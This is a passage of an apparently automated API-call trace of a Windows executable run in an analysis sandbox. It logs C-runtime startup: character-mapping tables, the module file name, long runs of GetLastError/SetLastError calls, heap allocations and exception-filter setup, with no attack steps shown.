!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ廁疈鸘@Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0069.592] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¤Ïúu\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0069.593] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4b7470, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\243e.tmp.exe.del105265203.del105731312.exe")) returned 0x50 [0069.593] GetLastError () returned 0x0 [0069.593] SetLastError (dwErrCode=0x0) [0069.593] GetLastError () returned 0x0 [0069.593] SetLastError (dwErrCode=0x0) [0069.593] GetLastError () returned 0x0 [0069.593] SetLastError (dwErrCode=0x0) [0069.593] GetLastError () returned 0x0 [0069.593] SetLastError (dwErrCode=0x0) [0069.593] GetLastError () returned 0x0 [0069.593] SetLastError (dwErrCode=0x0) [0069.593] GetLastError () returned 0x0 [0069.593] SetLastError (dwErrCode=0x0) [0069.593] GetLastError () returned 0x0 [0069.593] SetLastError (dwErrCode=0x0) [0069.593] GetLastError () returned 0x0 [0069.593] SetLastError (dwErrCode=0x0) [0069.594] GetLastError () returned 0x0 [0069.594] SetLastError (dwErrCode=0x0) [0069.594] GetLastError () returned 0x0 [0069.594] SetLastError (dwErrCode=0x0) [0069.594] GetLastError () returned 0x0 [0069.594] SetLastError (dwErrCode=0x0) [0069.594] GetLastError () returned 0x0 [0069.594] SetLastError (dwErrCode=0x0) [0069.594] GetLastError () returned 0x0 [0069.594] SetLastError (dwErrCode=0x0) [0069.594] GetLastError () returned 0x0 [0069.594] SetLastError (dwErrCode=0x0) [0069.594] GetLastError () returned 0x0 [0069.595] SetLastError (dwErrCode=0x0) [0069.595] GetLastError () returned 0x0 [0069.595] SetLastError (dwErrCode=0x0) [0069.595] GetLastError () returned 0x0 [0069.595] SetLastError (dwErrCode=0x0) [0069.595] GetLastError () returned 0x0 [0069.595] SetLastError (dwErrCode=0x0) [0069.595] GetLastError () returned 0x0 [0069.595] SetLastError (dwErrCode=0x0) [0069.595] GetLastError () returned 0x0 [0069.595] SetLastError (dwErrCode=0x0) [0069.595] GetLastError () returned 0x0 [0069.596] SetLastError (dwErrCode=0x0) [0069.596] GetLastError () returned 0x0 [0069.596] SetLastError (dwErrCode=0x0) [0069.596] GetLastError () returned 0x0 [0069.596] SetLastError (dwErrCode=0x0) [0069.596] GetLastError () returned 0x0 [0069.596] SetLastError (dwErrCode=0x0) [0069.596] GetLastError () returned 0x0 [0069.596] SetLastError (dwErrCode=0x0) [0069.596] GetLastError () returned 0x0 [0069.597] SetLastError (dwErrCode=0x0) [0069.597] GetLastError () returned 0x0 [0069.597] SetLastError (dwErrCode=0x0) [0069.597] GetLastError () returned 0x0 [0069.597] SetLastError (dwErrCode=0x0) [0069.597] GetLastError () returned 0x0 [0069.597] SetLastError (dwErrCode=0x0) [0069.597] GetLastError () returned 0x0 [0069.597] SetLastError (dwErrCode=0x0) [0069.597] GetLastError () returned 0x0 [0069.598] SetLastError (dwErrCode=0x0) [0069.598] GetLastError () returned 0x0 [0069.598] SetLastError (dwErrCode=0x0) [0069.598] GetLastError () returned 0x0 [0069.598] SetLastError (dwErrCode=0x0) [0069.598] GetLastError () returned 0x0 [0069.598] SetLastError (dwErrCode=0x0) [0069.598] GetLastError () returned 0x0 [0069.598] SetLastError (dwErrCode=0x0) [0069.599] GetLastError () returned 0x0 [0069.599] SetLastError (dwErrCode=0x0) [0069.599] GetLastError () returned 0x0 [0069.599] SetLastError (dwErrCode=0x0) [0069.599] GetLastError () returned 0x0 [0069.599] SetLastError (dwErrCode=0x0) [0069.599] GetLastError () returned 0x0 [0069.600] SetLastError (dwErrCode=0x0) [0069.600] GetLastError () returned 0x0 [0069.600] SetLastError (dwErrCode=0x0) [0069.600] GetLastError () returned 0x0 [0069.600] SetLastError (dwErrCode=0x0) [0069.600] GetLastError () returned 0x0 [0069.600] SetLastError (dwErrCode=0x0) [0069.600] GetLastError () returned 0x0 [0069.600] SetLastError (dwErrCode=0x0) [0069.600] GetLastError () returned 0x0 [0069.601] SetLastError (dwErrCode=0x0) [0069.601] GetLastError () returned 0x0 [0069.601] SetLastError (dwErrCode=0x0) [0069.601] GetLastError () returned 0x0 [0069.601] SetLastError (dwErrCode=0x0) [0069.601] GetLastError () returned 0x0 [0069.601] SetLastError (dwErrCode=0x0) [0069.601] GetLastError () returned 0x0 [0069.602] SetLastError (dwErrCode=0x0) [0069.602] GetLastError () returned 0x0 [0069.602] SetLastError (dwErrCode=0x0) [0069.602] GetLastError () returned 0x0 [0069.602] SetLastError (dwErrCode=0x0) [0069.602] GetLastError () returned 0x0 [0069.602] SetLastError (dwErrCode=0x0) [0069.602] GetLastError () returned 0x0 [0069.603] SetLastError (dwErrCode=0x0) [0069.603] GetLastError () returned 0x0 [0069.603] SetLastError (dwErrCode=0x0) [0069.603] GetLastError () returned 0x0 [0069.603] SetLastError (dwErrCode=0x0) [0069.603] GetLastError () returned 0x0 [0069.603] SetLastError (dwErrCode=0x0) [0069.603] GetLastError () returned 0x0 [0069.604] SetLastError (dwErrCode=0x0) [0069.604] GetLastError () returned 0x0 [0069.604] SetLastError (dwErrCode=0x0) [0069.604] GetLastError () returned 0x0 [0069.604] SetLastError (dwErrCode=0x0) [0069.604] GetLastError () returned 0x0 [0069.604] SetLastError (dwErrCode=0x0) [0069.604] GetLastError () returned 0x0 [0069.604] SetLastError (dwErrCode=0x0) [0069.604] GetLastError () returned 0x0 [0069.604] SetLastError (dwErrCode=0x0) [0069.604] GetLastError () returned 0x0 [0069.605] SetLastError (dwErrCode=0x0) [0069.605] GetLastError () returned 0x0 [0069.605] SetLastError (dwErrCode=0x0) [0069.605] GetLastError () returned 0x0 [0069.605] SetLastError (dwErrCode=0x0) [0069.605] GetLastError () returned 0x0 [0069.605] SetLastError (dwErrCode=0x0) [0069.605] GetLastError () returned 0x0 [0069.605] SetLastError (dwErrCode=0x0) [0069.605] GetLastError () returned 0x0 [0069.606] SetLastError (dwErrCode=0x0) [0069.606] GetLastError () returned 0x0 [0069.606] SetLastError (dwErrCode=0x0) [0069.606] GetLastError () returned 0x0 [0069.606] SetLastError (dwErrCode=0x0) [0069.606] GetLastError () returned 0x0 [0069.606] SetLastError (dwErrCode=0x0) [0069.606] GetLastError () returned 0x0 [0069.606] SetLastError (dwErrCode=0x0) [0069.606] GetLastError () returned 0x0 [0069.607] SetLastError (dwErrCode=0x0) [0069.607] GetLastError () returned 0x0 [0069.607] SetLastError (dwErrCode=0x0) [0069.607] GetLastError () returned 0x0 [0069.607] SetLastError (dwErrCode=0x0) [0069.607] GetLastError () returned 0x0 [0069.607] SetLastError (dwErrCode=0x0) [0069.607] GetLastError () returned 0x0 [0069.607] SetLastError (dwErrCode=0x0) [0069.607] GetLastError () returned 0x0 [0069.607] SetLastError (dwErrCode=0x0) [0069.608] GetLastError () returned 0x0 [0069.608] SetLastError (dwErrCode=0x0) [0069.608] GetLastError () returned 0x0 [0069.608] SetLastError (dwErrCode=0x0) [0069.608] GetLastError () returned 0x0 [0069.608] SetLastError (dwErrCode=0x0) [0069.608] GetLastError () returned 0x0 [0069.608] SetLastError (dwErrCode=0x0) [0069.608] GetLastError () returned 0x0 [0069.609] SetLastError (dwErrCode=0x0) [0069.609] GetLastError () returned 0x0 [0069.609] SetLastError (dwErrCode=0x0) [0069.609] GetLastError () returned 0x0 [0069.609] SetLastError (dwErrCode=0x0) [0069.609] GetLastError () returned 0x0 [0069.609] SetLastError (dwErrCode=0x0) [0069.609] GetLastError () returned 0x0 [0069.609] SetLastError (dwErrCode=0x0) [0069.609] GetLastError () returned 0x0 [0069.609] SetLastError (dwErrCode=0x0) [0069.609] GetLastError () returned 0x0 [0069.610] SetLastError (dwErrCode=0x0) [0069.610] GetLastError () returned 0x0 [0069.610] SetLastError (dwErrCode=0x0) [0069.610] GetLastError () returned 0x0 [0069.610] SetLastError (dwErrCode=0x0) [0069.610] GetLastError () returned 0x0 [0069.610] SetLastError (dwErrCode=0x0) [0069.610] GetLastError () returned 0x0 [0069.610] SetLastError (dwErrCode=0x0) [0069.610] GetLastError () returned 0x0 [0069.610] SetLastError (dwErrCode=0x0) [0069.610] GetLastError () returned 0x0 [0069.611] SetLastError (dwErrCode=0x0) [0069.611] GetLastError () returned 0x0 [0069.611] SetLastError (dwErrCode=0x0) [0069.611] GetLastError () returned 0x0 [0069.611] SetLastError (dwErrCode=0x0) [0069.611] GetLastError () returned 0x0 [0069.611] SetLastError (dwErrCode=0x0) [0069.611] GetLastError () returned 0x0 [0069.611] SetLastError (dwErrCode=0x0) [0069.611] GetLastError () returned 0x0 [0069.611] SetLastError (dwErrCode=0x0) [0069.611] GetLastError () returned 0x0 [0069.611] SetLastError (dwErrCode=0x0) [0069.611] GetLastError () returned 0x0 [0069.612] SetLastError (dwErrCode=0x0) [0069.612] GetLastError () returned 0x0 [0069.612] SetLastError (dwErrCode=0x0) [0069.612] GetLastError () returned 0x0 [0069.612] SetLastError (dwErrCode=0x0) [0069.612] GetLastError () returned 0x0 [0069.612] SetLastError (dwErrCode=0x0) [0069.612] GetLastError () returned 0x0 [0069.612] SetLastError (dwErrCode=0x0) [0069.612] GetLastError () returned 0x0 [0069.612] SetLastError (dwErrCode=0x0) [0069.612] GetLastError () returned 0x0 [0069.613] SetLastError (dwErrCode=0x0) [0069.613] GetLastError () returned 0x0 [0069.613] SetLastError (dwErrCode=0x0) [0069.613] GetLastError () returned 0x0 [0069.613] SetLastError (dwErrCode=0x0) [0069.613] GetLastError () returned 0x0 [0069.613] SetLastError (dwErrCode=0x0) [0069.613] GetLastError () returned 0x0 [0069.613] SetLastError (dwErrCode=0x0) [0069.613] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x0, Size=0x86) returned 0x2031990 [0069.613] GetLastError () returned 0x0 [0069.613] SetLastError (dwErrCode=0x0) [0069.613] GetLastError () returned 0x0 [0069.614] SetLastError (dwErrCode=0x0) [0069.614] GetLastError () returned 0x0 [0069.614] SetLastError (dwErrCode=0x0) [0069.614] GetLastError () returned 0x0 [0069.614] SetLastError (dwErrCode=0x0) [0069.614] GetLastError () returned 0x0 [0069.614] SetLastError (dwErrCode=0x0) [0069.614] GetLastError () returned 0x0 [0069.614] SetLastError (dwErrCode=0x0) [0069.614] GetLastError () returned 0x0 [0069.615] SetLastError (dwErrCode=0x0) [0069.615] GetLastError () returned 0x0 [0069.615] SetLastError (dwErrCode=0x0) [0069.615] GetLastError () returned 0x0 [0069.615] SetLastError (dwErrCode=0x0) [0069.615] GetLastError () returned 0x0 [0069.616] SetLastError (dwErrCode=0x0) [0069.616] GetLastError () returned 0x0 [0069.616] SetLastError (dwErrCode=0x0) [0069.616] GetLastError () returned 0x0 [0069.616] SetLastError (dwErrCode=0x0) [0069.616] GetLastError () returned 0x0 [0069.616] SetLastError (dwErrCode=0x0) [0069.616] GetLastError () returned 0x0 [0069.617] SetLastError (dwErrCode=0x0) [0069.617] GetLastError () returned 0x0 [0069.617] SetLastError (dwErrCode=0x0) [0069.617] GetLastError () returned 0x0 [0069.617] SetLastError (dwErrCode=0x0) [0069.617] GetLastError () returned 0x0 [0069.617] SetLastError (dwErrCode=0x0) [0069.617] GetLastError () returned 0x0 [0069.618] SetLastError (dwErrCode=0x0) [0069.618] GetLastError () returned 0x0 [0069.618] SetLastError (dwErrCode=0x0) [0069.618] GetLastError () returned 0x0 [0069.618] SetLastError (dwErrCode=0x0) [0069.618] GetLastError () returned 0x0 [0069.618] SetLastError (dwErrCode=0x0) [0069.619] GetLastError () returned 0x0 [0069.619] SetLastError (dwErrCode=0x0) [0069.619] GetLastError () returned 0x0 [0069.619] SetLastError (dwErrCode=0x0) [0069.619] GetLastError () returned 0x0 [0069.620] SetLastError (dwErrCode=0x0) [0069.620] GetLastError () returned 0x0 [0069.620] SetLastError (dwErrCode=0x0) [0069.620] GetLastError () returned 0x0 [0069.620] SetLastError (dwErrCode=0x0) [0069.620] GetLastError () returned 0x0 [0069.620] SetLastError (dwErrCode=0x0) [0069.620] GetLastError () returned 0x0 [0069.621] SetLastError (dwErrCode=0x0) [0069.621] GetLastError () returned 0x0 [0069.621] SetLastError (dwErrCode=0x0) [0069.621] GetLastError () returned 0x0 [0069.621] SetLastError (dwErrCode=0x0) [0069.621] GetLastError () returned 0x0 [0069.621] SetLastError (dwErrCode=0x0) [0069.621] GetLastError () returned 0x0 [0069.622] SetLastError (dwErrCode=0x0) [0069.622] GetLastError () returned 0x0 [0069.622] SetLastError (dwErrCode=0x0) [0069.622] GetLastError () returned 0x0 [0069.622] SetLastError (dwErrCode=0x0) [0069.622] GetLastError () returned 0x0 [0069.622] SetLastError (dwErrCode=0x0) [0069.622] GetLastError () returned 0x0 [0069.623] SetLastError (dwErrCode=0x0) [0069.623] GetLastError () returned 0x0 [0069.623] SetLastError (dwErrCode=0x0) [0069.623] GetLastError () returned 0x0 [0069.623] SetLastError (dwErrCode=0x0) [0069.623] GetLastError () returned 0x0 [0069.623] SetLastError (dwErrCode=0x0) [0069.623] GetLastError () returned 0x0 [0069.624] SetLastError (dwErrCode=0x0) [0069.624] GetLastError () returned 0x0 [0069.624] SetLastError (dwErrCode=0x0) [0069.624] GetLastError () returned 0x0 [0069.624] SetLastError (dwErrCode=0x0) [0069.624] GetLastError () returned 0x0 [0069.625] SetLastError (dwErrCode=0x0) [0069.625] GetLastError () returned 0x0 [0069.625] SetLastError (dwErrCode=0x0) [0069.625] GetLastError () returned 0x0 [0069.625] SetLastError (dwErrCode=0x0) [0069.625] GetLastError () returned 0x0 [0069.625] SetLastError (dwErrCode=0x0) [0069.625] GetLastError () returned 0x0 [0069.625] SetLastError (dwErrCode=0x0) [0069.625] GetLastError () returned 0x0 [0069.626] SetLastError (dwErrCode=0x0) [0069.626] GetLastError () returned 0x0 [0069.626] SetLastError (dwErrCode=0x0) [0069.626] GetLastError () returned 0x0 [0069.626] SetLastError (dwErrCode=0x0) [0069.626] GetLastError () returned 0x0 [0069.626] SetLastError (dwErrCode=0x0) [0069.626] GetLastError () returned 0x0 [0069.626] SetLastError (dwErrCode=0x0) [0069.626] GetLastError () returned 0x0 [0069.626] SetLastError (dwErrCode=0x0) [0069.626] GetLastError () returned 0x0 [0069.626] SetLastError (dwErrCode=0x0) [0069.626] GetLastError () returned 0x0 [0069.626] SetLastError (dwErrCode=0x0) [0069.627] GetLastError () returned 0x0 [0069.627] SetLastError (dwErrCode=0x0) [0069.627] GetLastError () returned 0x0 [0069.627] SetLastError (dwErrCode=0x0) [0069.627] GetLastError () returned 0x0 [0069.627] SetLastError (dwErrCode=0x0) [0069.627] GetLastError () returned 0x0 [0069.627] SetLastError (dwErrCode=0x0) [0069.627] GetLastError () returned 0x0 [0069.627] SetLastError (dwErrCode=0x0) [0069.627] GetLastError () returned 0x0 [0069.627] SetLastError (dwErrCode=0x0) [0069.628] GetLastError () returned 0x0 [0069.628] SetLastError (dwErrCode=0x0) [0069.628] GetLastError () returned 0x0 [0069.628] SetLastError (dwErrCode=0x0) [0069.628] GetLastError () returned 0x0 [0069.628] SetLastError (dwErrCode=0x0) [0069.628] GetLastError () returned 0x0 [0069.628] SetLastError (dwErrCode=0x0) [0069.628] GetLastError () returned 0x0 [0069.628] SetLastError (dwErrCode=0x0) [0069.628] GetLastError () returned 0x0 [0069.629] SetLastError (dwErrCode=0x0) [0069.629] GetLastError () returned 0x0 [0069.629] SetLastError (dwErrCode=0x0) [0069.629] GetLastError () returned 0x0 [0069.629] SetLastError (dwErrCode=0x0) [0069.629] GetLastError () returned 0x0 [0069.629] SetLastError (dwErrCode=0x0) [0069.629] GetLastError () returned 0x0 [0069.629] SetLastError (dwErrCode=0x0) [0069.629] GetLastError () returned 0x0 [0069.630] SetLastError (dwErrCode=0x0) [0069.630] GetLastError () returned 0x0 [0069.630] SetLastError (dwErrCode=0x0) [0069.630] GetLastError () returned 0x0 [0069.630] SetLastError (dwErrCode=0x0) [0069.630] GetLastError () returned 0x0 [0069.630] SetLastError (dwErrCode=0x0) [0069.630] GetLastError () returned 0x0 [0069.630] SetLastError (dwErrCode=0x0) [0069.630] GetLastError () returned 0x0 [0069.630] SetLastError (dwErrCode=0x0) [0069.630] GetLastError () returned 0x0 [0069.630] SetLastError (dwErrCode=0x0) [0069.630] GetLastError () returned 0x0 [0069.631] SetLastError (dwErrCode=0x0) [0069.631] GetLastError () returned 0x0 [0069.631] SetLastError (dwErrCode=0x0) [0069.631] GetLastError () returned 0x0 [0069.631] SetLastError (dwErrCode=0x0) [0069.631] GetLastError () returned 0x0 [0069.631] SetLastError (dwErrCode=0x0) [0069.632] GetLastError () returned 0x0 [0069.632] SetLastError (dwErrCode=0x0) [0069.632] GetLastError () returned 0x0 [0069.632] SetLastError (dwErrCode=0x0) [0069.632] GetLastError () returned 0x0 [0069.632] SetLastError (dwErrCode=0x0) [0069.632] GetLastError () returned 0x0 [0069.632] SetLastError (dwErrCode=0x0) [0069.632] GetLastError () returned 0x0 [0069.632] SetLastError (dwErrCode=0x0) [0069.632] GetLastError () returned 0x0 [0069.633] SetLastError (dwErrCode=0x0) [0069.633] GetLastError () returned 0x0 [0069.633] SetLastError (dwErrCode=0x0) [0069.633] GetLastError () returned 0x0 [0069.633] SetLastError (dwErrCode=0x0) [0069.633] GetLastError () returned 0x0 [0069.633] SetLastError (dwErrCode=0x0) [0069.633] GetLastError () returned 0x0 [0069.633] SetLastError (dwErrCode=0x0) [0069.634] GetLastError () returned 0x0 [0069.634] SetLastError (dwErrCode=0x0) [0069.634] GetLastError () returned 0x0 [0069.634] SetLastError (dwErrCode=0x0) [0069.634] GetLastError () returned 0x0 [0069.634] SetLastError (dwErrCode=0x0) [0069.634] GetLastError () returned 0x0 [0069.634] SetLastError (dwErrCode=0x0) [0069.634] GetLastError () returned 0x0 [0069.635] SetLastError (dwErrCode=0x0) [0069.635] GetLastError () returned 0x0 [0069.635] SetLastError (dwErrCode=0x0) [0069.635] GetLastError () returned 0x0 [0069.635] SetLastError (dwErrCode=0x0) [0069.635] GetLastError () returned 0x0 [0069.635] SetLastError (dwErrCode=0x0) [0069.635] GetLastError () returned 0x0 [0069.635] SetLastError (dwErrCode=0x0) [0069.635] GetLastError () returned 0x0 [0069.635] SetLastError (dwErrCode=0x0) [0069.635] GetLastError () returned 0x0 [0069.636] SetLastError (dwErrCode=0x0) [0069.636] GetLastError () returned 0x0 [0069.636] SetLastError (dwErrCode=0x0) [0069.636] GetLastError () returned 0x0 [0069.636] SetLastError (dwErrCode=0x0) [0069.636] GetLastError () returned 0x0 [0069.636] SetLastError (dwErrCode=0x0) [0069.636] GetLastError () returned 0x0 [0069.636] SetLastError (dwErrCode=0x0) [0069.636] GetLastError () returned 0x0 [0069.636] SetLastError (dwErrCode=0x0) [0069.636] GetLastError () returned 0x0 [0069.637] SetLastError (dwErrCode=0x0) [0069.637] GetLastError () returned 0x0 [0069.637] SetLastError (dwErrCode=0x0) [0069.637] GetLastError () returned 0x0 [0069.637] SetLastError (dwErrCode=0x0) [0069.637] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x98) returned 0x2031a20 [0069.637] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x1f) returned 0x2031ac0 [0069.637] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x36) returned 0x2031ae8 [0069.637] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x37) returned 0x2031b28 [0069.637] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x3c) returned 0x2031b68 [0069.637] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x31) returned 0x2031bb0 [0069.637] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x17) returned 0x2031bf0 [0069.637] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x24) returned 0x2031c10 [0069.637] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x14) returned 0x2031c40 [0069.637] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0xd) returned 0x2031c60 [0069.637] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x25) returned 0x2031c78 [0069.637] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x39) returned 0x2031ca8 [0069.637] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x18) returned 0x2031cf0 [0069.637] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x17) returned 0x2031d10 [0069.637] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0xe) returned 0x2031d30 [0069.637] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x69) returned 0x2031d48 [0069.637] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x3e) returned 0x2031dc0 [0069.637] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x1b) returned 0x2031e08 [0069.638] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x1d) returned 0x2031e30 [0069.638] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x48) returned 0x2031e58 [0069.638] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x12) returned 0x2031ea8 [0069.638] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x18) returned 0x2031ec8 [0069.638] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x1b) returned 0x2031ee8 [0069.638] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x24) returned 0x2031f10 [0069.638] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x29) returned 0x2031f40 [0069.638] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x1e) returned 0x2031f78 [0069.638] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x41) returned 0x2031fa0 [0069.638] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x17) returned 0x2031ff0 [0069.638] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0xf) returned 0x2032010 [0069.638] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x16) returned 0x2032028 [0069.638] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x2a) returned 0x2032048 [0069.638] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x29) returned 0x2032080 [0069.639] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x15) returned 0x20320b8 [0069.639] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x1e) returned 0x20320d8 [0069.639] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x2a) returned 0x2032100 [0069.639] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x12) returned 0x2032138 [0069.639] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x18) returned 0x2032158 [0069.639] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x46) returned 0x2032178 [0069.639] HeapFree (in: hHeap=0x2030000, dwFlags=0x0, lpMem=0x20311f8 | out: hHeap=0x2030000) returned 1 [0069.639] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76e10000 [0069.639] GetProcAddress (hModule=0x76e10000, lpProcName="IsProcessorFeaturePresent") returned 0x76e25235 [0069.640] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0069.641] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x800) returned 0x20321c8 [0069.641] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x80) returned 0x20311f8 [0069.642] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4043b5) returned 0x0 [0069.642] RtlSizeHeap (HeapHandle=0x2030000, Flags=0x0, MemoryPointer=0x20311f8) returned 0x80 [0069.643] GetLastError () returned 0x0 [0069.643] SetLastError (dwErrCode=0x0) [0069.643] GetLastError () returned 0x0 [0069.643] SetLastError (dwErrCode=0x0) [0069.643] GetLastError () returned 0x0 [0069.643] SetLastError (dwErrCode=0x0) [0069.643] GetLastError () returned 0x0 [0069.643] SetLastError (dwErrCode=0x0) [0069.643] GetLastError () returned 0x0 